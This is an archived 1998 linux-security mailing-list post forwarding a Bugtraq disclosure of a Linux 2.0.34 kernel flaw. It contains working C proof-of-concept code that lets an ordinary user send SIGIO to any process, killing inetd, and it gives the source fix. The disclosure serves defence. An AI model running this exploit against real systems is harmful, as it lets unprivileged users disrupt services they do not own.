[1957] in linux-security and linux-alert archive
[linux-security] Serious Linux 2.0.34 security problem (fwd)
daemon@ATHENA.MIT.EDU (Annex)
Sun Jul 5 04:51:38 1998
Date: Thu, 2 Jul 1998 11:03:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: linux-security@redhat.com
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem
I just saw this mentioned on linux-kernel and confirmed it;
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
int s, p;
if(argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}
This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO. Very bad.
The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.
David.
--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------
To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null